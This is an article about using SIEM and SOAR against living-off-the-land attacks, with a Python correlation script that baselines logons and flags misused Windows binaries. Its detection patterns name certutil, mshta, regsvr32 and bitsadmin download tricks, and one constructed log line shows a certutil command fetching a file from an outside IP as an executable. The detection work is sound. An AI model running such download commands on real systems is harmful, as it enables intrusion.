Harness SOAR and SIEM to boost IT security


The need for organisations to strengthen their cyber security posture has become more critical than ever before. 


In today’s digital era, practically every business has a hybrid infrastructure, which has enabled users to access information from anywhere. Although this is known to provide many benefits, it also paves the way for cyber-attacks, says Harish Sekar, head of business development at ManageEngine, a division of Zoho Corporation.

Sekar will be presenting on ‘The Role of SIEM in the POPI Act’, at the ITWeb Security Summit 2020, to be held as a virtual event from 25 to 28 August.

In his view, businesses should implement security orchestration, automation, and response (SOAR), as well as leverage artificial intelligence through machine learning to protect themselves from today’s threats. This is particularly true considering the COVID-19 pandemic. 

“The pandemic has seen work-from-home (WFH) policies become the norm, which has laid the way forward. Every organisation is now in a position where they need to make resources and data available to their users in all formats, and for all devices, including desktops, laptops and mobiles. And they need to protect them all.”

This, says Sekar, needs to be addressed from the top as hackers are just waiting for one small mistake or opening which could end up costing the company a fortune, not only in money, but in reputational damage.

“The biggest shift needs to be analysing user behaviour, connecting the dots instantly and tracing anomalies. This is where machine learning and AI will have an enormous impact,” he says.

Harish Sekar.

In addition, he says every log should be pumped into a security information and event management (SIEM) solution to help understand the actual operation within an organisation. “A well-connected SIEM solution will not only trace specific footprints but will also help remediate any necessary actions.”

Sekar says the cyber security threat landscape is changing rapidly, and will keep changing at an unprecedented pace. “There have always been three forms of threats: the known, the unknown, and the unknown and mysterious.”

He says end users have become tech-savvy and security-aware, but attackers have also raised their game. 

Hackers no longer need to install malware or rely on external tools as they did before. They have started using white-listed and trusted applications, launching so-called ‘living-off-the-land’ (LOTL) attacks which exploit preinstalled features and default tools that already exist in the target environment, Sekar explains. 
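The two ideas above, baselining user behaviour and catching trusted binaries used in untrusted ways, are what a SIEM correlation rule ties together. The script below is an added example written for this page; it is not ManageEngine, Zoho or ITWeb code and does not reflect any particular product's rules. The event dictionaries, the field names and the LOTL command-line patterns are assumptions standing in for what a SIEM would normalise out of Windows 4624 (logon) and 4688 (process creation) events, and every log record in it is constructed.

```python
"""Mini SIEM correlation over constructed Windows-style events.

Added example, not ManageEngine, Zoho or ITWeb code. Event dictionaries,
field names and LOTL patterns are assumptions standing in for what a SIEM
would normalise out of Windows 4624 (logon) and 4688 (process creation)
events; all sample data below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# LOTL indicators: trusted, preinstalled binaries invoked in ways that rarely
# occur in routine administration. Illustrative, not exhaustive.
LOTL_PATTERNS = [
    ("certutil download", re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)),
    ("powershell encoded command",
     re.compile(r"powershell(\.exe)?\s.*-e(nc|ncodedcommand)?\s", re.I)),
    ("mshta remote script",
     re.compile(r"mshta(\.exe)?\s+(https?:|vbscript:|javascript:)", re.I)),
    ("regsvr32 scriptlet", re.compile(r"regsvr32(\.exe)?\s.*/i:https?:", re.I)),
    ("bitsadmin transfer", re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I)),
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def build_baseline(history):
    """Per-user profile of hosts and logon hours seen in past logon events."""
    base = defaultdict(lambda: {"hosts": set(), "hours": set()})
    for e in history:
        if e["type"] == "logon":
            base[e["user"]]["hosts"].add(e["host"])
            base[e["user"]]["hours"].add(parse_ts(e["ts"]).hour)
    return base


def logon_anomalies(event, base):
    """Reasons a logon deviates from the user's baseline (empty list = normal)."""
    prof = base.get(event["user"])
    if prof is None:
        return ["user never seen before"]
    reasons = []
    if event["host"] not in prof["hosts"]:
        reasons.append("new host %s" % event["host"])
    hour = parse_ts(event["ts"]).hour
    if hour not in prof["hours"]:
        reasons.append("unusual hour %02d:00" % hour)
    return reasons


def lotl_matches(cmdline):
    """Names of the LOTL patterns that match a process command line."""
    return [name for name, rx in LOTL_PATTERNS if rx.search(cmdline)]


def correlate(history, live, window=timedelta(hours=1)):
    """Score live events against the baseline and connect the dots: a LOTL
    command shortly after an anomalous logon by the same user is escalated
    to high severity instead of being two unrelated medium alerts."""
    base = build_baseline(history)
    odd_logons = {}  # user -> (time, reasons) of the latest anomalous logon
    alerts = []
    for e in sorted(live, key=lambda x: x["ts"]):
        if e["type"] == "logon":
            reasons = logon_anomalies(e, base)
            if reasons:
                odd_logons[e["user"]] = (parse_ts(e["ts"]), reasons)
                alerts.append({"severity": "medium", "user": e["user"],
                               "host": e["host"], "ts": e["ts"], "why": reasons})
        elif e["type"] == "process":
            hits = lotl_matches(e["cmdline"])
            if not hits:
                continue
            severity, why = "medium", list(hits)
            prior = odd_logons.get(e["user"])
            if prior and parse_ts(e["ts"]) - prior[0] <= window:
                severity = "high"
                why.append("follows anomalous logon (%s)" % "; ".join(prior[1]))
            alerts.append({"severity": severity, "user": e["user"],
                           "host": e["host"], "ts": e["ts"], "why": why})
    return alerts


# Constructed sample data (not real logs). HISTORY feeds the baseline,
# LIVE is the stream being scored.
HISTORY = [
    {"type": "logon", "ts": "2020-08-10 08:05:10", "user": "alice", "host": "WS-ALICE"},
    {"type": "logon", "ts": "2020-08-11 09:12:33", "user": "alice", "host": "WS-ALICE"},
    {"type": "logon", "ts": "2020-08-12 13:40:02", "user": "alice", "host": "WS-ALICE"},
    {"type": "logon", "ts": "2020-08-10 09:01:45", "user": "bob", "host": "WS-BOB"},
    {"type": "logon", "ts": "2020-08-11 14:22:19", "user": "bob", "host": "WS-BOB"},
]
LIVE = [
    {"type": "logon", "ts": "2020-08-13 09:15:00", "user": "alice", "host": "WS-ALICE"},
    {"type": "process", "ts": "2020-08-13 09:40:12", "user": "alice", "host": "WS-ALICE",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "logon", "ts": "2020-08-14 03:12:44", "user": "bob", "host": "SRV-FILE01"},
    {"type": "process", "ts": "2020-08-14 03:20:10", "user": "bob", "host": "SRV-FILE01",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Users\Public\u.exe"},
]

if __name__ == "__main__":
    for a in correlate(HISTORY, LIVE):
        print(a["severity"].upper(), a["ts"], a["user"], a["host"], "|", "; ".join(a["why"]))
```

Run stand-alone it prints one medium alert for bob's 03:12 logon from a host he has never used, then a high alert for the certutil download that follows it within the hour; alice's scripted PowerShell run, which is routine administration, produces nothing. The escalation step is the point: neither event alone is conclusive, and a SIEM that only ingests one log source cannot make the link.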

The lesson is that businesses need to pay attention to the trends and monitor all activity within the organisation. “Pump every log into a SIEM solution to understand the actual operation within an organisation,” he concludes. “The results will surely surprise you.”
